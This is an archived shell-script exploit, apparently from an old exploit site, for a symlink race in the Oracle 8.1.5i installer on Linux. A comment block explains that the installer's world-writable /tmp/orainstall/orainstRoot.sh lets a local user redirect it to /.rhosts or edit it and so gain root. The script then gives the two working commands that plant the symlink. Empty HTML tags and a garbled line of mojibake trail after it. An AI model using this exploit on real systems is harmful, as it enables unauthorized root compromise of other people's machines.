#!/bin/sh # # A vulnerability exists in the installation program # for Oracle 8.1.5i. The Oracle installation scripts # will create a directory named /tmp/orainstall, # owned by oracle:dba, mode 711. Inside of this # directory it will create a shell script named # orainstRoot.sh, mode 777. The installation script # will then stop and ask the person installing to # run this script. The installation program at no # point attempts to determine if the directory or # script already exist. This makes it possible # to create a symbolic link from the orainstRoot.sh # file to elsewhere on the file system. This could # be used to create a .rhosts file, for instance, # and gain access to the root account. In addition, # since the orainstRoot.sh file is mode 777, it is # possible for any user on the machine to edit this # script to execute arbitrary commands when run by # root. Again, this can result in the compromise of # the root account. # # It is not readily apparent what version of Oracle # this does and does not affect. It has been # confirmed on Oracle 8.1.5i, on the Linux/Intel # platform. It is likely that this vulnerability # may exists in other versions, and on other # platforms. If you have any information about # this, please mail us at: vuldb@securityfocus.com. mkdir /tmp/orainstall ln -sf /.rhosts /tmp/orainstall/orainstRoot.sh # www.hack.co.za #
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß